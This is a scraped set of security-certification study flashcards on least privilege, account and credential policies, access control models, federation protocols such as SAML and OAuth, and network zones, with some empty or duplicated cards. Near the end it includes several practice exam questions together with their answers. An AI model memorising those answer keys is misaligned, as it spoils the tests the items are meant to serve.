Least Privilege

Definition

Least privilege means that a user is granted sufficient rights to perform his or her job and no more. This mitigates risk if the account should be compromised and fall under the control of a threat actor. Authorization creep refers to a situation where a user acquires more and more rights, either directly or by being added to security groups and roles. Least privilege should be ensured by closely analyzing business workflows to assess what privileges are required and by performing regular account audits. 

Term
Job Rotation 
Definition
Job rotation (or rotation of duties) means that no one person is permitted to remain in the same job for an extended period. For example, managers may be moved to different departments periodically, or employees may perform more than one job role, switching between them throughout the year. Rotating individuals into and out of roles, such as the firewall administrator or access control specialist, helps an organization 
Term
Mandatory Vacation 
Definition

Mandatory vacation means that employees are forced to take their vacation time, during which someone else fulfills their duties. The typical mandatory vacation policy requires that employees take at least one vacation a year in a full-week increment so that they are away from work for at least five days in a row. During that time, the corporate audit and security employees have time to investigate and discover any discrepancies in employee activity. 

Term
offboarding 
Definition

An exit interview (or offboarding) is the process of ensuring that an employee leaves a company gracefully. Offboarding is also used when a project using contractors or third parties ends. In terms of security, there are several processes that must be completed:

§  Account management—disable the user account and privileges. Ensure that any information assets created or managed by the employee but owned by the company are accessible (in terms of encryption keys or password-protected files).

§  Company assets—retrieve mobile devices, keys, smart cards, USB media, and so on. The employee will need to confirm (and in some cases prove) that they have not retained copies of any information assets.

§  Personal assets—wipe employee-owned devices of corporate data and applications. The employee may also be allowed to retain some information assets (such as personal emails or contact information), depending on the policies in force.

 

The departure of some types of employees should trigger additional processes to re-secure network systems. Examples include employees with detailed knowledge of security systems and procedures, and access to shared or generic account credentials. These credentials must be changed immediately. 

Term
Credential Management Policies for Personnel
Definition

 

Improper credential management continues to be one of the most fruitful vectors for network attacks. If an organization must continue to rely on password-based credentials, its usage needs to be governed by strong policies and training.

 

A password policy instructs users on best practice in choosing and maintaining passwords. More generally, a credential management policy should instruct users on how to keep their authentication method secure, whether this be a password, smart card, or biometric ID. Password protection policies mitigate against the risk of attackers being able to compromise an account and use it to launch other attacks on the network. The credential management policy also needs to alert users to diverse types of social engineering attacks. Users need to be able to spot phishing and pharming attempts, so that they do not enter credentials into an unsecure form or spoofed site. 

Term

Guest Accounts 

Definition

A guest account is a special type of shared account with no password. It allows anonymous and unauthenticated access to a resource. The Windows OS creates guest user and group accounts when installed, but the guest user account is disabled by default. Guest accounts are also created when installing web services, as most web servers allow unauthenticated access.

Term
security group account  
Definition

The concept of a security group account simplifies and centralizes the administrative process of assigning rights. Rather than assigning rights directly, the system owner assigns them to security group accounts. User accounts gain rights by being made a member of a security group. A user can be a member of multiple groups and can therefore receive rights and permissions from several sources.

Term

ADMINISTRATOR/ROOT ACCOUNTS 

Definition

Administrative or privileged accounts are able to install and remove apps and device drivers, change system-level settings, and access any object in the file system. Ideally, only accounts that have been created and assigned specific permissions should have this kind of elevated privilege. In practice, it is very hard to eliminate the presence of default administrator accounts. A default account is one that is created by the operating system or application when it is installed. The default account has every permission available. In Windows, this account is called Administrator; in Linux, it is called root. This type of account is also referred to as a superuser.

Term

Generic Administrator Account Management

Definition

Superuser accounts directly contradict the principles of least privilege and separation of duties. Consequently, superuser accounts should be prohibited from logging on in normal circumstances. The default superuser account should be restricted to disaster recovery operations only. In Windows, the account is usually disabled by default and can be further restricted using group policy (docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-h--securing-local-administrator-accounts-and-groups). The first user account created during setup has superuser permissions, however.

 

On Windows networks, you also need to distinguish between local administrators and domain administrators. The scope of a local administrator's privileges is restricted to the machine hosting the account. Domain administrators can have privileges over any machine joined to the domain.

 

Ubuntu Linux follows a similar approach; the root account is configured with no password and locked, preventing login. An alternate superuser account is created during setup. In other Linux distributions, a password is usually set at install time. This password must be kept as secure as is possible.

Term

Administrator Credential Policies 

Definition

The default superuser should be replaced with one or more named accounts with sufficient elevated privileges for a given job role. This can be referred to as generic account prohibition. It means that administrative activity can be audited and the system as a whole conforms to the property of non-repudiation. 

It is a good idea to restrict the number of administrative accounts as much as possible. The more accounts there are, the more likely it is that one of them will be compromised. On the other hand, you do not want administrators to share accounts, as that compromises accountability.

 

Users with administrative privileges must take the greatest care with credential management. Privilege-access accounts must use strong passwords and ideally multifactor authentication (MFA). 

Term

Default Security Groups

Definition

Most operating systems also create default security groups, with a default set of permissions. In Windows, privileges are assigned to local group accounts (the Users and Administrators groups) rather than directly to user accounts. Custom security groups with different permissions can be created to enforce the principle of least privilege. In Linux, privileged accounts are typically configured by adding either a user or a group account to the /etc/sudoers file (linux.com/training-tutorials/start-fine-tuning-sudo-linux).

Term
SERVICE ACCOUNTS 
Definition

Service accounts are used by scheduled processes and application server software, such as databases. Windows has several default service account types. These do not accept user interactive logons but can be used to run processes and background services:

§  System—has the most privileges of any Windows account. The local system account creates the host processes that start Windows before the user logs on. Any process created using the system account will have full privileges over the local computer.

§  Local Service—has the same privileges as the standard user account. It can only access network resources as an anonymous user.

 

§  Network Service—has the same privileges as the standard user account but can present the computer's account credentials when accessing network resources.

Term
shared account  
Definition

shared account is one where passwords (or other authentication credentials) are known to more than one person. Typically, simple SOHO networking devices do not allow for the creation of multiple accounts and a single "Admin" account is used to manage the device. These accounts might be configured with a default password. Other examples include the default (or generic) OS accounts, such as Administrator and Guest in Windows or root in Linux, or accounts added to default security groups. Shared accounts may also be set up for temporary staff.

 


A shared account breaks the principle of non-repudiation and makes an accurate audit trail difficult to establish. It makes it more likely that the password for the account will be compromised. The other major risk involves password changes to an account. Since frequent password changing is a common policy, organizations will need to ensure that everyone who has access to an account knows when the password will change, and what that new password will be. This necessitates distributing passwords to a large group of people, which itself poses a significant challenge to security. Shared accounts should only be used where these risks are understood and accepted.

Term

Credential Policies for Devices 

Definition

Network appliances designed for enterprise use are unlikely to be restricted to a single default account, and will use TACACS+ to support individual accounts and role-based permissions. If a device can only be operated with a shared password, ensure separation of duties to ensure the device remains in an authorized configuration.

Term

Privilege Access Management 

Definition
Even with the most carefully designed role-based permissions, it is almost impossible to eliminate use of shared/device/root passwords completely. Enterprise privilege access management products provide a solution for storing these high-risk credentials somewhere other than a spreadsheet and for auditing elevated privileges generally 
Term
SSH uses two types of key pairs
Definition

 

§  A host key pair identifies an SSH server. The server reveals the public part when a client connects to it. The client must use some means of determining the validity of this public key. If accepted, the key pair is used to encrypt the network connection and start a session.

 

§  A user key pair is a means for a client to login to an SSH server. The server stores a copy of the client's public key. The client uses the linked private key to generate an authentication request and sends the request (not the private key) to the server. The server can only validate this request if the correct public key is held for that client.

Term
application programming interface (API) 
Definition

A library of programming utilities used, for example, to enable software developers to access functions of the TCP/IP network stack under a particular operating system.

 

Term

Account Attributes 

Definition

A user account is defined by a unique security identifier (SID), a name, and a credential. Each account is associated with a profile. The profile can be defined with custom identity attributes describing the user, such as a full name, email address, contact number, department, and so on. The profile may support media, such as an account picture.As well as attributes, the profile will usually provide a location for storing user-generated data files (a home folder). The profile can also store per-account settings for software applications. 

 

Term

Access Policies 

Definition

Each account can be assigned permissions over files and other network resources and access policies or privileges over the use and configuration of network hosts. These permissions might be assigned directly to the account or inherited through membership of a security group or role. Access policies determine things like the right to log on to a computer locally or via remote desktop, install software, change the network configuration, and so on.

Term
group policy objects (GPOs)
Definition

On a Windows Active Directory network, access policies can be configured via group policy objects (GPOs). GPOs can be used to configure access rights for user/group/role accounts. GPOs can be linked to network administrative boundaries in Active Directory, such as sites, domains, and Organizational Units (OU). 

Term
Password complexity 
Definition

§  enforces password complexity rules (that is, no use of username within password and combination of at least eight upper/lower case alpha-numeric and non-alpha-numeric characters).

Term
Password reuse and history 
Definition

§  prevents the selection of a password that has been used already. The history attribute sets how many previous passwords are blocked.

Term
Password aging 
Definition
forces the user to select a new password after a set number of days.
Term
There are several types of geolocation
Definition

§  IP address—these can be associated with a map location to varying degrees of accuracy based on information published by the registrant, including name, country, region, and city. The registrant is usually the Internet service provider (ISP), so the information you receive will provide an approximate location of a host based on the ISP. If the ISP is one that serves a large or diverse geographical area, you will be less likely to pinpoint the location of the host Internet service providers (ISPs). Software libraries, such as GeoIP (maxmind.com/en/geoip-demo), facilitate querying this data.

 

§  Location Services—these are methods used by the OS to calculate the device's geographical position. A device with a global positioning system (GPS) sensor can report a highly accurate location when outdoors. Location services can also triangulate to cell towers, Wi-Fi hotspots, and Bluetooth signals where GPS is not supported.

Term
Geofencing  
Definition
Geofencing refers to accepting or rejecting access requests based on location. Geofencing can also be used for push notification to send alerts or advice to a device when a user enters a specific area.
Term
Geotagging  
Definition
Geotagging refers to the addition of location metadata to files or devices. This is often used for asset management to ensure devices are kept with the proper location. 
Term

Time-Based Restrictions

 

There are three main types of time-based policies:

Definition

§  time of day policy establishes authorized logon hours for an account.

§  A time-based login policy establishes the maximum amount of time an account may be logged in for.

 

§  An impossible travel time/risky login policy tracks the location of login events over time. If these do not meet a threshold, the account will be disabled. For example, a user logs in to an account from a device in New York. A couple of hours later, a login attempt is made from LA, but this is refused and an alert raised because it is not feasible for the user to be in both locations.

Term

ACCOUNT AUDITS
(EVENT VIEWER)

Accounting and auditing processes are used to detect whether an account has been compromised or is being misused. A security or audit log can be used to facilitate detection of account misuse: 

 

Definition

§  Accounting for all actions that have been performed by users. Change and version control systems depend on knowing when a file has been modified and by whom. Accounting also provides for non-repudiation (that is, a user cannot deny that they accessed or made a change to a file). The main problems are that auditing successful access attempts can quickly consume a lot of disk space, and analyzing the logs can be very time-consuming.

 

§  Detecting intrusions or attempted intrusions. Here records of failure-type events are likely to be more useful, though success-type events can also be revealing if they show unusual access patterns.

Account auditing also refers to more general change control. You need to take account of changes to resources and users. Resources may be updated, archived, or have their clearance level changed. Users may leave, arrive, or change jobs (roles).

Term

ACCOUNT PERMISSIONS 

Where many users, groups, roles, and resources are involved, managing account permissions is complex and time-consuming. Improperly configured accounts can have two different types of impact. On the one hand, setting privileges that are too restrictive creates a large volume of support calls and reduces productivity. On the other hand, granting too many privileges to users weakens the security of the system and increases the risk of things like malware infection and data breach.

Definition

The phrase "authorization creep" refers to an employee who gains more and more access privileges the longer they remain with the organization.

A user may be granted elevated privileges temporarily (escalation). In this case, some system needs to be in place to ensure that the privileges are revoked at the end of the agreed period.

 

A system of auditing needs to be put in place so that privileges are reviewed regularly. Auditing would include monitoring group membership and reviewing access control lists for each resource plus identifying and disabling unnecessary accounts.

Term

USAGE AUDITS 
Usage auditing means configuring the security log to record key indicators and then reviewing the logs for suspicious activity.

Definition

Some typical categories include:

§  Account logon and management events.

§  Process creation.

§  Object access (file system/file shares).

§  Changes to audit policy.

 

§  Changes to system security and integrity (antivirus, host firewall, and so on).

Term
ACCOUNT LOCKOUT 
Definition

An account lockout means that login is prevented for a period. This might be done manually if a policy violation is detected, but there are several scenarios for automatically applying a lockout:

§  An incorrect account password is entered repeatedly.

§  The account is set to expire. Setting an account expiration date means that an account cannot be used beyond a certain date. This option is useful on accounts for temporary and contract staff.

 

§  When using time- or location-based restrictions, the server periodically checks whether the user has the right to continue using the network. If the user does not have the right, then an automatic logout procedure commences.

Term
ACCOUNT DISABLEMENT
Definition

If account misuse is detected or suspected, the account can be manually disabled by setting an account property. This prevents the account from being used for login. Note that disabling the account does not close existing sessions. You can issue a remote logoff command to close a session. Account disablement means that login is permanently prevented until an administrator manually re-enables the account.

Term
Discretionary Access Control (DAC) 
Definition

Discretionary access control (DAC) is based on the primacy of the resource owner. The owner is originally the creator of a file or service, though ownership can be assigned to another user. The owner is granted full control over the resource, meaning that he or she can modify its access control list (ACL) to grant rights to others.

DAC is the most flexible model and is currently implemented widely in terms of computer and network security. In terms of file system security, it is the model used by default for most UNIX/Linux distributions and by Microsoft Windows. As the most flexible model, it is also the weakest because it makes centralized administration of security policies the most difficult to enforce. It is also the easiest to compromise, as it is vulnerable to insider threats and abuse of compromised accounts.

Term
permissions 
Definition

Security settings that control access to objects including file system items and network resources.

 

Term
Discretionary access control (DAC) 
Definition

Access control model where each resource is protected by an Access Control List (ACL) managed by the resource's owner (or owners).

 

Term

Role-Based Access Control (RBAC) 

Definition

An access control model where resources are protected by ACLs that are managed by administrators and that provide user permissions based on job functions.

 

Term

Role-Based Access Control (RBAC) 

Definition

Role-based access control (RBAC) adds an extra degree of centralized control to the DAC model. Under RBAC, a set of organizational roles are defined, and subjects allocated to those roles. Under this system, the right to modify roles is reserved to a system owner. Therefore, the system is non-discretionary, as each subject account has no right to modify the ACL of a resource, even though they may be able to change the resource in other ways. Users are said to gain rights implicitly (through being assigned to a role) rather than explicitly (being assigned the right directly).

 

RBAC can be partially implemented through the use of security group accounts, but they are not identical schemes. Membership of security groups is largely discretionary (assigned by administrators, rather than determined by the system). Also, ideally, a subject should only inherit the permissions of a role to complete a particular task rather than retain them permanently.

Term
For example, in Linux, there are three basic permissions:
Definition

§  Read (r)—the ability to access and view the contents of a file or list the contents of a directory.

§  Write (w)—the ability to save changes to a file, or create, rename, and delete files in a directory (also requires execute).

§  Execute (x)—the ability to run a script, program, or other software file, or the ability to access a directory, execute a file from that directory, or perform a task on that directory, such as file search.

These permissions can be applied in the context of the owner user (u), a group account (g), and all other users/world (o). A permission string lists the permissions granted in each of these contexts:

chmod u=rwx,g=rx,o=rx home

The string above shows that for the directory (d), the owner has read, write, and execute permissions, while the group context and other users have read and execute permissions.


The 
chmod command is used to modify permissions. It can be used in symbolic mode or absolute mode. In symbolic mode, the command works as follows:


chmod g+w,o-x home

The effect of this command is to append write permission to the group context and remove execute permission from the other context. By contrast, the command can also be used to replace existing permissions. For example, the following command applies the configuration shown in the first permission string:

chmod u=rwx,g=rx,o=rx home

In absolute mode, permissions are assigned using octal notation, where r=4, w=2, and x=1. For example, the following command has the same effect:

 

chmod 755 home

Term

Mandatory Access Control (MAC)

Definition

Mandatory access control (MAC) is based on the idea of security clearance levels. Rather than defining ACLs on resources, each object and each subject is granted a clearance level, referred to as a label. If the model used is a hierarchical one (that is, high clearance users are trusted to access low clearance objects), subjects are only permitted to access objects at their own clearance level or below.

 

The labeling of objects and subjects takes place using pre-established rules. The critical point is that these rules cannot be changed by any subject account, and are therefore non-discretionary. Also, a subject is not permitted to change an object's label or to change his or her own label.

Term

Attribute-Based Access Control (ABAC) 

Definition

Attribute-based access control (ABAC) is the most fine-grained type of access control model. As the name suggests, an ABAC system is capable of making access decisions based on a combination of subject and object attributes plus any context-sensitive or system-wide attributes. As well as group/role memberships, these attributes could include information about the OS currently being used, the IP address, or the presence of up-to-date patches and anti-malware. An attribute-based system could monitor the number of events or alerts associated with a user account or with a resource, or track access requests to ensure they are consistent in terms of timing of requests or geographic location. It could be programmed to implement policies, such as M-of-N control and separation of duties.

Term
As such, RBAC, ABAC, and MAC are all examples of rule-based (or non-discretionary) access control. 
Definition
Term
Rule-based access control  
Definition

Rule-based access control is a term that can refer to any sort of access control model where access control policies are determined by system-enforced rules rather than system users. As such, RBAC, ABAC, and MAC are all examples of rule-based (or non-discretionary) access control. As well as the formal models, rule-based access control principles are increasingly being implemented to protect computer and network systems founded on discretionary access from the sort of misconfiguration that can occur through DAC.

Term

Conditional Access 

Definition
Conditional access is an example of rule-based access control. A conditional access system monitors account or device behavior throughout a session. If certain conditions are met, the account may be suspended or the user may be required to reauthenticate, perhaps using a 2-step verification method. The User Account Control (UAC) and sudo restrictions on privileged accounts are examples of conditional access. The user is prompted for confirmation or authentication when requests that require elevated privileges are made. Role-based rights management and ABAC systems can apply a number of criteria to conditional access, including location-based policies 
Term
Privileged access management (PAM)  
Definition

A privileged account is one that can make significant configuration changes to a host, such as installing software or disabling a firewall or other security system. Privileged accounts also have rights to log on network appliances and application servers.

Privileged access management (PAM) refers to policies, procedures, and technical controls to prevent the malicious abuse of privileged accounts and to mitigate risks from weak configuration control over privileges. These controls identify and document privileged accounts, giving visibility into their use, and manage the credentials used to access them

Term
Directory services [image]
Definition

Directory services are the principal means of providing privilege management and authorization on an enterprise network, storing information about users, computers, security groups/roles, and services. A directory is like a database, where an object is like a record, and things that you know about the object (attributes) are like fields. In order for products from different vendors to be interoperable, most directories are based on the same standard. The Lightweight Directory Access Protocol (LDAP) is a protocol widely used to query and update X.500 format directories. 

The types of attributes, what information they contain, and the way object types are defined through attributes (some of which may be required, and some optional) is described by the directory schema. Some of the attributes commonly used include common name (CN), organizational unit (OU), organization (O), country (C), and domain component (DC). For example, the distinguished name of a web server operated by Widget in the UK might be:

 

CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK, DC=widget, DC=foo

Term
Federation 
Definition
Federation is the notion that a network needs to be accessible to more than just a well-defined group of employees. In business, a company might need to make parts of its network open to partners, suppliers, and customers. The company can manage its employee accounts easily enough. Managing accounts for each supplier or customer internally may be more difficult. Federation means that the company trusts accounts created and managed by a different network.
Term
Identity Providers and Attestation
Definition

In these models, the networks perform federated identity management. A user from one network is able to provide attestation that proves their identity. In very general terms, the process is similar to that of Kerberos authorization, and works as follows:

1.    The user (principal) attempts to access a service provider (SP), or the relying party (RP). The service provider redirects the principal to the identity provider (IdP) to authenticate.

2.    The principal authenticates with the identity provider and obtains an attestation of identity, in the form of some sort of token or document signed by the IdP.

3.    The principal presents the attestation to the service provider. The SP can validate that the IdP has signed the attestation because of its trust relationship with the IdP.

 

4.    The service provider can now connect the authenticated principal to its own accounts database. It may be able to query attributes of the user account profile held by the IdP, if the principal has authorized this type of access.

Term

Cloud versus On-Premises Requirements 

Definition

Where a company needs to make use of cloud services or share resources with business partner networks, authentication and authorization design comes with more constraints and additional requirements. Web applications might not support Kerberos, while third-party networks might not support direct federation with Active Directory/LDAP. The design for these cloud networks is likely to require the use of standards for performing federation and attestation between web applications.

Term
Security Assertion Markup Language (SAML)  
Definition

A federated network or cloud needs specific protocols and technologies to implement user identity assertions and transmit attestations between the principal, the relying party, and the identity provider. Security Assertion Markup Language (SAML) is one such solution. SAML attestations (or authorizations) are written in eXtensible Markup Language (XML). Communications are established using HTTP/HTTPS and the Simple Object Access Protocol (SOAP). These secure tokens are signed using the XML signature specification. The use of a digital signature allows the relying party to trust the identity provider.

Term
(SOAP)
Definition
Simple Object Access Protocol
Term
(REST) 
Definition

Representational State Transfer (REST) 

Many public clouds use application programming interfaces (APIs) based on Representational State Transfer (REST) rather than SOAP. These are often called RESTful APIs. Where SOAP is a tightly specified protocol, REST is a looser architectural framework. This allows the service provider more choice over implementation elements. Compared to SOAP and SAML, there is better support for mobile apps.  

Term
(OAuth) 
Definition

Open Authorization (OAuth)


Standard for federated identity management, allowing resource servers or consumer sites to work with user accounts created and managed on a separate identity provider.

 

 

Term
Open Authorization (OAuth)
Definition

Authentication and authorization for a RESTful API is often implemented using the Open Authorization (OAuth) protocol. OAuth is designed to facilitate sharing of information (resources) within a user profile between sites. The user creates a password-protected account at an identity provider (IdP). The user can use that account to log on to an OAuth consumer site without giving the password to the consumer site. A user (resource owner) can grant a client an authorization to access some part of their account. A client in this context is an app or consumer site.

The user account is hosted by one or more resource servers. A resource server is also called an API server because it hosts the functions that allow clients (consumer sites and mobile apps) to access user attributes. Authorization requests are processed by an authorization server. A single authorization server can manage multiple resource servers; equally the resource and authorization server could be the same server instance.

 

The client app or service must be registered with the authorization server. As part of this process, the client registers a redirect URL, which is the endpoint that will process authorization tokens. Registration also provides the client with an ID and a secret. The ID can be publicly exposed, but the secret must be kept confidential between the client and the authorization server. When the client application requests authorization, the user approves the authorization server to grant the request using an appropriate method. OAuth supports several grant types—or flows—for use in different contexts, such as server to server or mobile app to server. Depending on the flow type, the client will end up with an access token validated by the authorization server. The client presents the access token to the resource server, which then accepts the request for the resource if the token is valid.

OAuth uses the JavaScript object notation (JSON) web token (JWT) format for claims data. JWTs can easily be passed as Base64-encoded strings in URLs and HTTP headers and can be digitally signed for authentication and integrity.

Term

OpenID Connect (OIDC)

Definition

OAuth is explicitly designed to authorize claims and not to authenticate users. The implementation details for fields and attributes within tokens are not defined. There is no mechanism to validate that a user who initiated an authorization request is still logged on and present. The access token once granted has no authenticating information. Open ID Connect (OIDC) is an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields.

 

Note that OpenID can also refer to an earlier protocol developed between 2005 and 2007. This implemented a similar framework and underpinned early "sign on with" functionality, but is now regarded as obsolete. OpenID uses XML-format messaging and supports only web applications and not mobile apps.

Term

Acceptable Use Policy  

Definition

Enforcing an acceptable use policy (AUP) is important to protect the organization from the security and legal implications of employees misusing its equipment. Typically, the policy will forbid the use of equipment to defraud, to defame, or to obtain illegal material. It will prohibit the installation of unauthorized hardware or software and explicitly forbid actual or attempted snooping of confidential data that the employee is not authorized to access. Acceptable use guidelines must be reasonable and not interfere with employees' fundamental job duties or privacy rights. An organization's AUP may forbid use of Internet tools outside of work-related duties or restrict such use to break times.

Term
Code of Conduct and Social Media Analysis  
Definition

code of conduct, or rules of behavior, sets out expected professional standards. For example, employees' use of social media and file sharing poses substantial risks to the organization, including threat of virus infection or systems intrusion, lost work time, copyright infringement, and defamation. Users should be aware that any data communications, such as email, made through an organization's computer system are likely stored within the system, on servers, backup devices, and so on. Such communications are also likely to be logged and monitored. Employers may also subject employees' personal social media accounts to analysis and monitoring, to check for policy infringements.

 


Rules of behavior are also important when considering employees with privileged access to computer systems. Technicians and managers should be bound by clauses that forbid them from misusing privileges to snoop on other employees or to disable a security mechanism. 

Term

Clean Desk Policy  

Definition

clean desk policy means that each employee's work area should be free from any documents left there. The aim of the policy is to prevent sensitive information from being obtained by unauthorized staff or guests at the workplace.

Term

USER AND ROLE-BASED TRAINING

Definition

Appropriate security awareness training needs to be delivered to employees at all levels, including end users, technical staff, and executives. Some of the general topics that need to be covered include the following:

§  Overview of the organization's security policies and the penalties for non-compliance.

§  Incident identification and reporting procedures.

§  Site security procedures, restrictions, and advice, including safety drills, escorting guests, use of secure areas, and use of personal devices.

§  Data handling, including document confidentiality, PII, backup, encryption, and so on.

§  Password and account management plus security features of PCs and mobile devices.

§  Awareness of social engineering and malware threats, including phishing, website exploits, and spam plus alerting methods for new threats.

§  Secure use of software such as browsers and email clients plus appropriate use of Internet access, including social networking sites.

 

There should also be a system for identifying staff performing security-sensitive roles and grading the level of training and education required (between beginner, intermediate, and advanced, for instance). Note that in defining such training programs you need to focus on job roles, rather than job titles, as employees may perform different roles and have different security training, education, or awareness requirements in each role.

Term

Phishing Campaigns

Definition

A phishing campaign training event means sending simulated phishing messages to users. Users that respond to the messages can be targeted for follow-up training.

Term

Capture the Flag 

Definition

Capture the Flag (CTF) is usually used in ethical hacker training programs and gamified competitions. Participants must complete a series of challenges within a virtualized computing environment to discover a flag. The flag will represent either threat actor activity (for blue team exercises) or a vulnerability (for red team exercises) and the participant must use analysis and appropriate tools to discover it. Capturing the flag allows the user to progress to the next level and start a new challenge. Once the participant has passed the introductory levels, they will join a team and participate in a competitive event, where there are multiple flags embedded in the environment and capturing them wins points for the participant and for their team.

Term
Computer-based training (CBT) 
Definition

Computer-based training (CBT) allows a student to acquire skills and experience by completing various types of practical activities:

§  Simulations—recreating system interfaces or using emulators so students can practice configuration tasks.

 

§  Branching scenarios—students choose between options to find the best choices to solve a cybersecurity incident or configuration problem.

Term
Usage auditing
Definition

Usage auditing refers to configuring the security log to record key indicators and then reviewing the logs for suspicious activity. Behavior recorded by event logs that differs from expected behavior may indicate everything from a minor security infraction to a major incident.

 

Term
Permission auditing
Definition

The systems administrator puts in place permission auditing to review privileges regularly. This includes monitoring group membership and access control lists for each resource plus identifying and disabling unnecessary accounts.

 

Term
Information security audit
Definition

An information security audit measures how the organization's security policy is employed and determines how secure the network or site is that is being audited.

 

Term
Compliance audit
Definition
 
Term
Code of Conduct
Definition

A code of conduct, or rules of behavior, sets out expected professional standards, such as employees' use of social media and file sharing, and how it poses substantial risks to the organization, including threat of virus infection or systems intrusion.

 

Term
Clean Desk
Definition

A clean desk policy means that each employee's work area should be free from any documents left there.

 

Term
Capture the Flag
Definition
Term
  1. Acceptable Use Policy 
Definition

Enforcing an acceptable use policy (AUP) is important to protect the organization from the security and legal implications of employees misusing its equipment.

Term
Discretionary Access Control (DAC)
Definition

In DAC, the owner has full control over the resource, meaning that he or she can modify its ACL to grant rights to others. DAC is the most flexible and weakest control model.

 

Term
Security Assertion Markup Language (SAML) 
Definition

Security Assertion Markup Language (SAML) is an identity federation format used to exchange authentication information between the principal, the service provider, and the identity provider.

 

Term
Open Authorization (OAuth) 
Definition

Authentication and authorization for a RESTful API is often implemented using the Open Authorization (OAuth) protocol.

 

Term
OpenID 
Definition

OpenID is an identity federation method enabling users authentication on cooperating websites by a third-party authentication service.

 

Term
Lightweight Directory Access Protocol (LDAP)  
Definition

Lightweight Directory Access Protocol (LDAP) is not an identity federation. It is a network protocol used to access network directory databases storing information about authorized users and their privileges, as well as other organizational information.

 

Term

The System account, not the Local Service account, creates the host processes that start Windows before the user logs on.

Definition
Term

 

Consider the role trust plays in federated identity management and determine which models rely on networks to establish trust relationships. (Select all that apply.)

Definition
  1. SAML
  2. OAuth
  3. OpenID

    Security Assertion Markup Language (SAML) is an identity federation format used to exchange authentication information between the principal, the service provider, and the identity provider.

    Authentication and authorization for a RESTful API is often implemented using the Open Authorization (OAuth) protocol.

    OpenID is an identity federation method enabling users authentication on cooperating websites by a third-party authentication service.

Term

 

Windows has several service account types, typically used to run processes and background services. Which of the following statements about service accounts is FALSE?

Definition
  1. The Local service account creates the host processes and starts Windows before the user logs on.

    The System account, not the Local Service account, creates the host processes that start Windows before the user logs on.

     

Term

 

An employee is working on a team to build a directory of systems they are installing in a classroom. The team is using the Lightweight Directory Access Protocol (LDAP) to update the X.500 directory. Utilizing the standards of an X.500 directory, which of the following distinguished names is the employee most likely to recommend?

Definition
  1. CN=system1,CN=user,OU=Univ,DC=local

    A distinguished name is a unique identifier for any given resource within an X.500-like directory and made up of attribute=value pairs, separated by commas. The most specific attribute lists first, and then successive attributes become progressively broader.

     

Term

 

A senior administrator is teaching a new technician how to properly develop a standard naming convention in Active Directory (AD). Examine the following responses and determine which statements are sound advice for completing this task. (Select all that apply.)

Definition
  1. Within each root-level Organizational Unit (OU), use separate child OUs for different types of objects
  2. Consider grouping Organizational Units (OU) by location or department

    Organizational Units (OUs) represent administrative boundaries. They allow the enterprise administrator to delegate administrative responsibility for users and resources in different locations or departments. An OU grouped by location will be sufficient if different IT departments are responsible for services in different geographic locations. An OU grouped by department is more applicable if different IT departments are responsible for supporting different business functions.

    Within each root-level parent OU, use separate child OUs for different types of objects such as servers, client systems, users and groups. Be consistent.



Term
Switches 
Definition

§  forward frames between nodes in a cabled network. Switches work at layer 2 of the OSI modelAt layer 2 they make forwarding decisions based on the hardware or Media Access Control (MAC) address of attached nodes. Switches can establish network segments that either map directly to the underlying cabling or logical segments, created in the switch configuration as  virtual LANs (VLANs).

 

When designing and troubleshooting a network, it is helpful to compartmentalize functions to discrete layers. The Open Systems Interconnection (OSI) model is a widely quoted example of how to define layers of network functions.

Term
Wireless access points 
Definition
provide a bridge between a cabled network and wireless clients, or stations. Access points work at layer 2 of the OSI model.
Term
Routers 
Definition
forward packets around an internetwork, making forwarding decisions based on IP addresses. Routers work at layer 3 of the OSI model. Routers can apply logical IP subnet addresses to segments within a network.
Term
Firewalls 
Definition

§  apply an access control list (ACL) to filter traffic passing in or out of a network segment. Firewalls can work at layer 3 of the OSI model or higher.

Term
Load balancers 
Definition
distribute traffic between network segments or servers to optimize performance. Load balancers can work at various layers of the OSI model.
Term
Domain Name System (DNS)  
Definition
servers—host name records and perform name resolution to allow applications and users to address hosts and services using fully qualified domain names (FQDNs) rather than IP addresses. DNS works at layer 7 of the OSI model. Name resolution is a critical service in network design. Abuse of name resolution is a common attack vector.
Term
 segment 
Definition

A portion of a network where all attached hosts can communicate freely with one another.

 

Term
Segregation 
Definition

A situation where hosts on one network segment are prevented from or restricted in communicating with hosts on other segments.

 

Term
zone 
Definition

zone is an area of the network where the security configuration is the same for all hosts within it. Zones should be segregated from one another by physical and/or logical segmentation, using VLANs and subnets. Traffic between zones should be strictly controlled using a security device, typically a firewall.

Term
Intranet (private network) 
Definition

this is a network of trusted hosts owned and controlled by the organization. Within the intranet, there may be sub-zones for different host groups, such as servers, employee workstations, VoIP handsets, and management workstations.

Hosts are trusted in the sense that they are under your administrative control and subject to the security mechanisms (antivirus software, user rights, software updating, and so on) that you have set up to defend the network.

Term
Extranet 
Definition
this is a network of semi-trusted hosts, typically representing business partners, suppliers, or customers. Hosts must authenticate to join the extranet.
Term
demilitarized zones (DMZs)
A segment isolated from the rest of a private network by one or more firewalls that accepts connections from the Internet over designated ports.
Definition
A DMZ is also referred to as a perimeter or edge network. The basic principle of a DMZ is that traffic cannot pass directly through it. A DMZ enables external clients to access data on private systems, such as web servers, without compromising the security of the internal network as a whole. If communication is required between hosts on either side of a DMZ, a host within the DMZ acts as a proxy. For example, if an intranet host requests a connection with a web server on the Internet, a proxy in the DMZ takes the request and checks it. If the request is valid, it retransmits it to the destination. External hosts have no idea about what (if anything) is behind the DMZ.

Term
extranet  
Definition

A private network that provides some access to outside parties, particularly vendors, partners, and select customers.

 

Term
bastion hosts 
Definition

A server typically found in a DMZ that is configured to provide a single service to reduce the possibility of compromise.

 

Term

It is quite likely that more than one DMZ will be required as the services that run in them may have different security requirements :

§  A DMZ hosting proxies or secure web gateways to allow employees access to web browsing and other Internet services.

§  A DMZ hosting communication servers, such as email, VoIP, and conferencing.

§  A DMZ for servers providing remote access to the local network via a Virtual Private Network (VPN).

§  A DMZ hosting traffic for authorized cloud applications.

 

§  A multi-tier DMZ to isolate front-end, middleware, and back-end servers.

Definition
Term

Screened Subnet 

Definition
A screened subnet uses two firewalls placed on either side of the DMZ. The edge firewall restricts traffic on the external/public interface and allows permitted traffic to the hosts in the DMZ. The edge firewall can be referred to as the screening firewall or router. The internal firewall filters communications between hosts in the DMZ and hosts on the LAN. This firewall is often described as the choke firewall. A choke point is a purposefully narrow gateway that facilitates better access control and easier monitoring.
Term

